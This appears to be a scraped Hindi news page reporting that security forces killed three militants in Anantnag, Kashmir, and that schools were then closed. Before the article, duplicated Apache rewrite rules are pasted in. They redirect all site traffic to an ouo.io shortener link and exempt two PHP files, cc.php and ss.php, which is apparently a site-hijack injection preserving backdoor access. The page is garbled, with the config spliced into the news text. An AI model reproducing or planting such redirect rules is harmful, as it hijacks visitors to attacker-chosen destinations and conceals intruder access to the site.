
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 608
Previous Nextश्रीनगर। जम्मू-कश्मीर के अनंतनाग में सुरक्षा बलों और आतंकवादियों के बीच हुई मुठभेड़ में तीन आतंकवादी ढेर हो गए। बताया जा रहा है कि मारे गए आतंकियों में एक पाकिस्तानी है, जबकि दो स्थानीय आतंकी हैं।
सेना के एक अधिकारी ने बताया कि इलाके में आतंकवादियों की मौजूदगी की जानकारी मिलने के बाद रविवार देर रात अनंतनाग जिले के हकुरा इलाके में आतंकवाद विरोधी एक ऑपरेशन शुरू किया गया था। उन्होंने बताया कि सुरक्षा बलों के साथ भोर से पहले हुई मुठभेड़ में तीन आतंकवादी मारे गए। पुलिस के एक प्रवक्ता ने बताया कि मारे गए दो आतंकियों की पहचान श्रीनगर के रहने वाले ईसा फजली और अनंतनाग के कोकेरनाग के रहने वाले सैयद ओवैस के रूप में की गई। तीसरे आतंकी की पहचान की जा रही है। प्रवक्ता ने बताया, 'घटनास्थल से हथियार और गोला बारूद जिसमें एके- 47 रायफल, पिस्तौल, हथगोले आदि बरामद किए गए। अभियान के दौरान किसी आम नागरिक को कोई नुकसान नहीं पहुंचा है।' उन्होंने कहा कि मारे गए आतंकियों में से एक शहर के सोउरा इलाके में पुलिस चौकी पर हाल में हुए हमले में शामिल था। उस घटना में पुलिस का एक कांस्टेबल मारा गया था। इस बीच अधिकारियों ने एहतियाती तौर पर स्कूलों और अन्य शैक्षिणक संस्थानों को बंद करने का आदेश दिया। प्रशासन के एक वरिष्ठ अधिकारी ने कहा कि कानून-व्यवस्था को कायम रखने के लिए स्कूलों और कॉलेजों को बंद किया गया। वहीं कश्मीर विश्वविद्यालय ने भी एक दिन के लिए क्लास सस्पेंड कर दिए और परीक्षाएं भी टाल दी है।